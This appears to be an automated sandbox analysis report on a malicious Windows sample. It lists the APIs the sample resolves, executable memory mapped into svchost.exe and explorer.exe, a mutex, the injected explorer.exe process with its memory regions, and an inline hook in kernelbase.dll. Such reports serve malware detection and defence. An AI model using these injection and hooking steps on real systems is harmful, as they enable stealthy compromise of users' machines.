Get Address - function = GetTempFileNameA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = DeleteCriticalSection, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = VirtualProtect, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = CloseHandle, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = WriteProcessMemory, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = CreateFileA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = lstrcmpiA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetModuleFileNameA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = LoadLibraryA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetCurrentProcess, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = lstrcmpA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetModuleHandleA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = CreateFileMappingA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = MapViewOfFile, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = Sleep, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = UnmapViewOfFile, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GlobalLock, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = lstrlenA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GlobalAlloc, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GlobalUnlock, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = HeapAlloc, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = lstrcpyA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetLastError, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = HeapFree, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = RemoveDirectoryA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = DeleteFileA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = lstrcatA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = WriteFile, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = CreateDirectoryA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = HeapDestroy, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = HeapCreate, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = SetEvent, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = HeapReAlloc, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetTickCount, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = FindNextFileW, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = CopyFileW, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = SetWaitableTimer, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = LocalAlloc, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetCurrentThread, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetCurrentThreadId, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = lstrlenW, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetSystemTimeAsFileTime, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = CreateEventA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetWindowsDirectoryA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = DeleteFileW, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = CreateDirectoryW, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = CreateWaitableTimerA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetTempPathA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = FindFirstFileW, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = LocalFree, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = TerminateProcess, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = SuspendThread, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = WaitForMultipleObjects, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = ResumeThread, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = lstrcpyW, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = FileTimeToSystemTime, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = CreateThread, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = CreateFileW, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = ResetEvent, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = SwitchToThread, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = lstrcatW, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = CreateProcessW, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetFileSize, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetFileAttributesW, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = ExpandEnvironmentStringsW, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = WideCharToMultiByte, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = LeaveCriticalSection, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = SetLastError, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = EnterCriticalSection, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetComputerNameA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = CreateMutexA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = OpenWaitableTimerA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = OpenMutexA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetVolumeInformationA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = WaitForSingleObject, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = ReleaseMutex, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetComputerNameW, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = InitializeCriticalSection, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = LoadLibraryExW, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetProcAddress, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = VirtualFree, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetLogicalDriveStringsW, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetFileAttributesA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = OpenFileMappingA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetExitCodeProcess, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = CreateProcessA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = lstrcpynA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = LocalReAlloc, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = TlsAlloc, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = TlsGetValue, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = TlsSetValue, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = LoadLibraryW, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetVersionExW, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = FreeLibrary, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = ReadFile, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = SetFilePointer, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = Thread32First, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = QueueUserAPC, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = CreateToolhelp32Snapshot, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = OpenThread, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = Thread32Next, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = FindFirstFileA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = FindNextFileA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = ConnectNamedPipe, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetOverlappedResult, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = CancelIo, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = DisconnectNamedPipe, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = FlushFileBuffers, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = CallNamedPipeA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = CreateNamedPipeA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetSystemTime, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = WaitNamedPipeA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetCurrentProcessId, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = SleepEx, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = OpenEventA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = lstrcmpiW, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = RaiseException, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetSystemInfo, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = Process32NextW, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = Process32FirstW, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = QueueUserWorkItem, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = FileTimeToLocalFileTime, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = FindClose, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetDriveTypeW, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = VirtualProtectEx, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = AVIStreamRelease, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = AVIStreamWrite, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = AVIFileOpenA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = AVIFileCreateStreamA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = AVIStreamSetFormat, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = AVIFileExit, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = AVIFileInit, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = AVIMakeCompressedStream, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = AVIFileRelease, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsWow64Process, address_out = 0x7ff977ace960 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = ConvertStringSecurityDescriptorToSecurityDescriptorA, address_out = 0x7ff976f9d610 True 1
Fn
Get Address c:\windows\system32\shlwapi.dll function = StrRChrA, address_out = 0x7ff977374dd0 True 1
Fn
Get Address c:\windows\system32\user32.dll function = wsprintfA, address_out = 0x7ff9757d2610 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegOpenKeyA, address_out = 0x7ff976f9b9e0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegQueryValueExA, address_out = 0x7ff976f97dd0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegCloseKey, address_out = 0x7ff976f972e0 True 1
Fn
Get Address c:\windows\system32\shlwapi.dll function = StrToIntExA, address_out = 0x7ff977374e70 True 1
Fn
Get Address c:\windows\system32\shlwapi.dll function = StrChrA, address_out = 0x7ff977374cc0 True 1
Fn
Get Address c:\windows\system32\shlwapi.dll function = StrTrimA, address_out = 0x7ff977374e80 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = GetUserNameA, address_out = 0x7ff976faec40 True 1
Fn
Get Address c:\windows\system32\psapi.dll function = EnumProcessModules, address_out = 0x7ff977821040 True 1
Fn
Get Address c:\windows\system32\shlwapi.dll function = StrStrIW, address_out = 0x7ff97736b260 True 1
Fn
Get Address c:\windows\system32\user32.dll function = GetShellWindow, address_out = 0x7ff9757d4060 True 1
Fn
Get Address c:\windows\system32\user32.dll function = GetWindowThreadProcessId, address_out = 0x7ff9757c4040 True 1
Fn
Get Address c:\windows\system32\ntdll.dll function = RtlExitUserThread, address_out = 0x7ff977f39fa0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegCreateKeyA, address_out = 0x7ff976fc6dc0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = GetUserNameW, address_out = 0x7ff976f9da40 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegSetValueExA, address_out = 0x7ff976f82680 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegOpenKeyExA, address_out = 0x7ff976f97d70 True 1
Fn
Create Mapping - protection = PAGE_EXECUTE_READWRITE, maximum_size = 758389732128 True 1
Fn
Map - process_name = c:\windows\system32\svchost.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0xb095520000 True 1
Fn
Map - process_name = c:\windows\explorer.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x7490000 True 1
Fn
System (6)
Operation Additional Information Success Count Logfile
Get Computer Name - False 1
Fn
Get Computer Name result_out = LHNIWSJ True 2
Fn
Sleep duration = 100 milliseconds (0.100 seconds) True 1
Fn
Get Time type = Ticks, time = 109515 True 1
Fn
Get Info type = Operating System True 1
Fn
Mutex (1)
Operation Additional Information Success Count Logfile
Create mutex_name = {1E24E139-E5BC-00C9-5F32-E93403862DA8} True 1
Fn
Process #12: explorer.exe
5731 16
Information Value
ID #12
File Name c:\windows\explorer.exe
Command Line C:\Windows\Explorer.EXE
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:03:28, Reason: Injection
Unmonitor End Time: 00:04:37, Reason: Terminated by Timeout
Monitor Duration 00:01:09
OS Process Information
Information Value
PID 0x834
Parent PID 0x664 (c:\windows\system32\userinit.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x960
0xB5C
0xB54
0xB38
0xB30
0xB0C
0xB08
0xB04
0xB00
0xAFC
0xAF8
0xAF4
0xAF0
0xAEC
0xAE8
0xABC
0x988
0x984
0x974
0x96C
0x968
0x958
0x950
0x94C
0x948
0x944
0x940
0x93C
0x938
0x920
0x91C
0x918
0x914
0x910
0x90C
0x908
0x904
0x900
0x8D4
0x8CC
0x8C8
0x8C0
0x8BC
0x8B8
0x8B0
0x8AC
0x8A8
0x8A0
0x89C
0x898
0x894
0x890
0x88C
0x884
0x880
0x860
0x85C
0x850
0x84C
0x848
0x844
0x83C
0x838
0xB40
0xB3C
0xB50
0xB64
0xB2C
0xB24
0x954
0x794
0x700
0x38C
0x7B8
0x8E8
0x598
0x784
0x990
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
pagefile_0x00000000000b0000 0x000b0000 0x000bffff Pagefile Backed Memory rw True False False -
private_0x00000000000c0000 0x000c0000 0x000c6fff Private Memory rw True False False -
pagefile_0x00000000000d0000 0x000d0000 0x000e3fff Pagefile Backed Memory r True False False -
private_0x00000000000f0000 0x000f0000 0x0016ffff Private Memory rw True False False -
pagefile_0x0000000000170000 0x00170000 0x00173fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000180000 0x00180000 0x00182fff Pagefile Backed Memory r True False False -
private_0x0000000000190000 0x00190000 0x00191fff Private Memory rw True False False -
locale.nls 0x001a0000 0x0025dfff Memory Mapped File r False False False -
private_0x0000000000260000 0x00260000 0x002dffff Private Memory rw True False False -
2314.bin 0x00260000 0x00260fff Memory Mapped File r True True False
private_0x00000000002e0000 0x002e0000 0x002e6fff Private Memory rw True False False -
explorer.exe.mui 0x002f0000 0x002f7fff Memory Mapped File r False False False -
private_0x0000000000300000 0x00300000 0x00300fff Private Memory rw True False False -
private_0x0000000000310000 0x00310000 0x00310fff Private Memory rw True False False -
private_0x0000000000320000 0x00320000 0x0041ffff Private Memory rw True False False -
pagefile_0x0000000000420000 0x00420000 0x00420fff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000430000 0x00430000 0x00430fff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000440000 0x00440000 0x00440fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000450000 0x00450000 0x00450fff Pagefile Backed Memory r True False False -
cversions.1.db 0x00460000 0x00463fff Memory Mapped File r True False False -
pagefile_0x0000000000470000 0x00470000 0x00470fff Pagefile Backed Memory rw True False False -
private_0x0000000000480000 0x00480000 0x0048ffff Private Memory rw True False False -
pagefile_0x0000000000490000 0x00490000 0x00617fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000620000 0x00620000 0x007a0fff Pagefile Backed Memory r True False False -
pagefile_0x00000000007b0000 0x007b0000 0x01baffff Pagefile Backed Memory r True False False -
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001c.db 0x01bb0000 0x01bc2fff Memory Mapped File r True False False -
private_0x0000000001bd0000 0x01bd0000 0x01c4ffff Private Memory rw True False False -
{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x0000000000000036.db 0x01c50000 0x01c6bfff Memory Mapped File r True False False -
pagefile_0x0000000001c70000 0x01c70000 0x01c72fff Pagefile Backed Memory r True False False -
private_0x0000000001c80000 0x01c80000 0x01c8ffff Private Memory rw True False False -
sortdefault.nls 0x01c90000 0x01fc6fff Memory Mapped File r False False False -
private_0x0000000001fd0000 0x01fd0000 0x0204ffff Private Memory rw True False False -
private_0x0000000002050000 0x02050000 0x020cffff Private Memory rw True False False -
private_0x00000000020d0000 0x020d0000 0x0214ffff Private Memory rw True False False -
shell32.dll.mui 0x02150000 0x021b0fff Memory Mapped File r False False False -
pagefile_0x00000000021c0000 0x021c0000 0x021c2fff Pagefile Backed Memory r True False False -
pagefile_0x00000000021d0000 0x021d0000 0x021f9fff Pagefile Backed Memory rw True False False -
kernelbase.dll.mui 0x02200000 0x022defff Memory Mapped File r False False False -
private_0x00000000022e0000 0x022e0000 0x0235ffff Private Memory rw True False False -
private_0x0000000002360000 0x02360000 0x023dffff Private Memory rw True False False -
private_0x00000000023e0000 0x023e0000 0x0245ffff Private Memory rw True False False -
pagefile_0x0000000002460000 0x02460000 0x02461fff Pagefile Backed Memory r True False False -
pagefile_0x0000000002470000 0x02470000 0x02471fff Pagefile Backed Memory r True False False -
private_0x0000000002480000 0x02480000 0x0257ffff Private Memory rw True False False -
oleaccrc.dll 0x02580000 0x02581fff Memory Mapped File r False False False -
oleaccrc.dll.mui 0x02590000 0x02594fff Memory Mapped File r False False False -
pagefile_0x00000000025a0000 0x025a0000 0x02657fff Pagefile Backed Memory r True False False -
pagefile_0x0000000002660000 0x02660000 0x02663fff Pagefile Backed Memory r True False False -
private_0x0000000002670000 0x02670000 0x0276ffff Private Memory rw True False False -
private_0x0000000002770000 0x02770000 0x02770fff Private Memory rw True False False -
staticcache.dat 0x02780000 0x037bffff Memory Mapped File r False False False -
private_0x00000000037c0000 0x037c0000 0x037c6fff Private Memory rw True False False -
private_0x00000000037d0000 0x037d0000 0x037d0fff Private Memory rw True False False -
private_0x00000000037e0000 0x037e0000 0x037e0fff Private Memory rw True False False -
private_0x00000000037f0000 0x037f0000 0x037f0fff Private Memory rw True False False -
private_0x0000000003800000 0x03800000 0x0387ffff Private Memory rw True False False -
private_0x0000000003880000 0x03880000 0x03881fff Private Memory rw True False False -
private_0x0000000003890000 0x03890000 0x03890fff Private Memory rw True False False -
private_0x00000000038a0000 0x038a0000 0x038a0fff Private Memory rw True False False -
private_0x00000000038b0000 0x038b0000 0x038b0fff Private Memory rw True False False -
pagefile_0x00000000038c0000 0x038c0000 0x038c2fff Pagefile Backed Memory r True False False -
cversions.1.db 0x038d0000 0x038d3fff Memory Mapped File r True False False -
private_0x00000000038e0000 0x038e0000 0x038e0fff Private Memory rw True False False -
pagefile_0x00000000038f0000 0x038f0000 0x038f0fff Pagefile Backed Memory rw True False False -
private_0x0000000003900000 0x03900000 0x03900fff Private Memory rw True False False -
pagefile_0x0000000003910000 0x03910000 0x03912fff Pagefile Backed Memory r True False False -
pagefile_0x0000000003920000 0x03920000 0x03958fff Pagefile Backed Memory rw True False False -
pagefile_0x0000000003960000 0x03960000 0x03962fff Pagefile Backed Memory r True False False -
private_0x0000000003970000 0x03970000 0x03970fff Private Memory rw True False False -
private_0x0000000003980000 0x03980000 0x03980fff Private Memory rw True False False -
cversions.2.db 0x03990000 0x03993fff Memory Mapped File r True False False -
stobject.dll.mui 0x039a0000 0x039a1fff Memory Mapped File r False False False -
pagefile_0x00000000039b0000 0x039b0000 0x039b2fff Pagefile Backed Memory r True False False -
pagefile_0x00000000039c0000 0x039c0000 0x039c2fff Pagefile Backed Memory r True False False -
iconcache_idx.db 0x039d0000 0x039d1fff Memory Mapped File rw True False False -
counters.dat 0x039d0000 0x039d0fff Memory Mapped File rw True True False
imageres.dll.mui 0x039e0000 0x039e0fff Memory Mapped File r False False False -
pagefile_0x00000000039f0000 0x039f0000 0x039f2fff Pagefile Backed Memory r True False False -
private_0x0000000003a00000 0x03a00000 0x03a00fff Private Memory rw True False False -
private_0x0000000003a10000 0x03a10000 0x03a8ffff Private Memory rw True False False -
private_0x0000000003a90000 0x03a90000 0x03a90fff Private Memory rw True False False -
cversions.2.db 0x03aa0000 0x03aa3fff Memory Mapped File r True False False -
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000f.db 0x03ab0000 0x03af2fff Memory Mapped File r True False False -
cversions.2.db 0x03b00000 0x03b03fff Memory Mapped File r True False False -
private_0x0000000003b10000 0x03b10000 0x03b10fff Private Memory rw True False False -
pagefile_0x0000000003b20000 0x03b20000 0x03b22fff Pagefile Backed Memory r True False False -
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db 0x03b30000 0x03bbafff Memory Mapped File r True False False -
propsys.dll.mui 0x03bc0000 0x03bd0fff Memory Mapped File r False False False -
private_0x0000000003be0000 0x03be0000 0x03c5ffff Private Memory rw True False False -
private_0x0000000003c60000 0x03c60000 0x03cdffff Private Memory rw True False False -
private_0x0000000003ce0000 0x03ce0000 0x03d5ffff Private Memory rw True False False -
private_0x0000000003d60000 0x03d60000 0x03ddffff Private Memory rw True False False -
pagefile_0x0000000003de0000 0x03de0000 0x042d1fff Pagefile Backed Memory rw True False False -
private_0x00000000042e0000 0x042e0000 0x0435ffff Private Memory rw True False False -
private_0x0000000004360000 0x04360000 0x0445ffff Private Memory rw True False False -
thumbcache_idx.db 0x04460000 0x04461fff Memory Mapped File rw True False False -
thumbcache_48.db 0x04470000 0x0456ffff Memory Mapped File rw True False False -
netmsg.dll 0x04570000 0x04570fff Memory Mapped File r False False False -
netmsg.dll.mui 0x04580000 0x045b1fff Memory Mapped File r False False False -
iconcache_idx.db 0x045c0000 0x045c1fff Memory Mapped File rw True False False -
pagefile_0x00000000045d0000 0x045d0000 0x045d1fff Pagefile Backed Memory r True False False -
private_0x00000000045e0000 0x045e0000 0x0465ffff Private Memory rw True False False -
iconcache_48.db 0x04660000 0x0475ffff Memory Mapped File rw True False False -
private_0x00000000047e0000 0x047e0000 0x0485ffff Private Memory rw True False False -
private_0x0000000004860000 0x04860000 0x048dffff Private Memory rw True False False -
private_0x00000000048e0000 0x048e0000 0x0495ffff Private Memory rw True False False -
private_0x0000000004960000 0x04960000 0x0515ffff Private Memory - True False False -
private_0x0000000005160000 0x05160000 0x051dffff Private Memory rw True False False -
pagefile_0x00000000051e0000 0x051e0000 0x051e2fff Pagefile Backed Memory r True False False -
inputswitch.dll.mui 0x051f0000 0x051f1fff Memory Mapped File r False False False -
private_0x0000000005200000 0x05200000 0x05200fff Private Memory rw True False False -
pagefile_0x0000000005210000 0x05210000 0x05212fff Pagefile Backed Memory r True False False -
private_0x0000000005220000 0x05220000 0x05228fff Private Memory rw True False False -
private_0x0000000005230000 0x05230000 0x05233fff Private Memory rw True False False -
private_0x0000000005240000 0x05240000 0x05240fff Private Memory rw True False False -
thumbcache_idx.db 0x05250000 0x05251fff Memory Mapped File rw True False False -
private_0x0000000005260000 0x05260000 0x05260fff Private Memory rw True False False -
private_0x0000000005270000 0x05270000 0x05278fff Private Memory rw True False False -
private_0x0000000005280000 0x05280000 0x0537ffff Private Memory rw True False False -
pagefile_0x0000000005380000 0x05380000 0x05382fff Pagefile Backed Memory r True False False -
private_0x0000000005390000 0x05390000 0x053d7fff Private Memory rw True False False -
private_0x00000000053e0000 0x053e0000 0x0545ffff Private Memory rw True False False -
private_0x0000000005460000 0x05460000 0x054a7fff Private Memory rw True False False -
private_0x00000000054b0000 0x054b0000 0x0552ffff Private Memory rw True False False -
private_0x0000000005530000 0x05530000 0x055affff Private Memory rw True False False -
private_0x00000000055b0000 0x055b0000 0x0562ffff Private Memory rw True False False -
private_0x0000000005630000 0x05630000 0x056affff Private Memory rw True False False -
private_0x00000000056b0000 0x056b0000 0x0572ffff Private Memory rw True False False -
private_0x0000000005730000 0x05730000 0x057affff Private Memory rw True False False -
private_0x00000000057b0000 0x057b0000 0x0582ffff Private Memory rw True False False -
private_0x0000000005830000 0x05830000 0x058affff Private Memory rw True False False -
private_0x00000000058b0000 0x058b0000 0x0592ffff Private Memory rw True False False -
private_0x0000000005930000 0x05930000 0x059affff Private Memory rw True False False -
pagefile_0x00000000059b0000 0x059b0000 0x059b1fff Pagefile Backed Memory r True False False -
private_0x00000000059c0000 0x059c0000 0x05a3ffff Private Memory rw True False False -
windows.storage.dll.mui 0x05a40000 0x05a47fff Memory Mapped File r False False False -
sndvolsso.dll.mui 0x05a50000 0x05a51fff Memory Mapped File r False False False -
private_0x0000000005a60000 0x05a60000 0x05a6dfff Private Memory rw True False False -
pagefile_0x0000000005a70000 0x05a70000 0x05a72fff Pagefile Backed Memory r True False False -
pagefile_0x0000000005a80000 0x05a80000 0x05a80fff Pagefile Backed Memory rw True False False -
{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x0000000000000037.db 0x05b80000 0x05b9cfff Memory Mapped File r True False False -
private_0x0000000005ba0000 0x05ba0000 0x05ba0fff Private Memory rw True False False -
private_0x0000000005bb0000 0x05bb0000 0x05daffff Private Memory rw True False False -
iconcache_48.db 0x05db0000 0x05eaffff Memory Mapped File rw True False False -
private_0x0000000005eb0000 0x05eb0000 0x05f2ffff Private Memory rw True False False -
private_0x0000000005f30000 0x05f30000 0x05faffff Private Memory rw True False False -
thumbcache_idx.db 0x05fb0000 0x05fb1fff Memory Mapped File rw True False False -
pagefile_0x0000000005fc0000 0x05fc0000 0x05fc1fff Pagefile Backed Memory r True False False -
pagefile_0x0000000006010000 0x06010000 0x06010fff Pagefile Backed Memory rw True False False -
private_0x0000000006020000 0x06020000 0x06020fff Private Memory rw True False False -
private_0x0000000006030000 0x06030000 0x060affff Private Memory rw True False False -
private_0x00000000060b0000 0x060b0000 0x0612ffff Private Memory rw True False False -
For performance reasons, the remaining 350 entries are omitted.
The remaining entries can be found in flog.txt.
Hook Information
Type Installer Target Size Information Actions
Code pagefile_0x0000000007490000:+0x28dce kernelbase.dll:ActivatorUpdateForIsRouterChanges+0x146 8 bytes -
